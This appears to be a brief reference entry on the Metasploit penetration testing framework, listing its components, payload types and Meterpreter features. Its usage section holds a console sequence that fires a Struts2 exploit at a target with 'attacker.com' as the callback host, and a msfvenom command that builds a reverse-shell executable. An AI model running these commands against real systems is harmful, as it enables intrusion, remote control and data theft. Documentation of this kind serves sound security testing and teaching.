Metasploit

Metasploit is a penetration testing framework providing tools for developing, testing, and executing exploits against target systems. It includes a vast database of exploits, payloads, and auxiliary modules.

Core Components

• Exploits: Code that takes advantage of vulnerabilities
• Payloads: Code delivered after successful exploit
• Auxiliary: Scanning, fuzzing, and enumeration modules
• Post: Post-exploitation modules
• Encoders: Payload obfuscation

Basic Usage

# Start Metasploit console
msfconsole

# Search for exploits
msf> search type:exploit apache struts

# Use an exploit
msf> use exploit/multi/http/struts2_content_type_ognl
msf> show options
msf> set RHOSTS target.com
msf> set LHOST attacker.com
msf> exploit

Common Payloads

# Reverse shells
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp

# Bind shells
windows/shell/bind_tcp

# Generate standalone payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell.exe

Meterpreter

Advanced payload providing interactive shell with features like:

• File system navigation and transfer
• Process migration
• Keylogging
• Screenshot capture
• Privilege escalation

Versions

• Framework (OSS): Free, command-line focused
• Pro: Commercial with GUI and automation

See Also

• Exploit Payload
• Burp Suite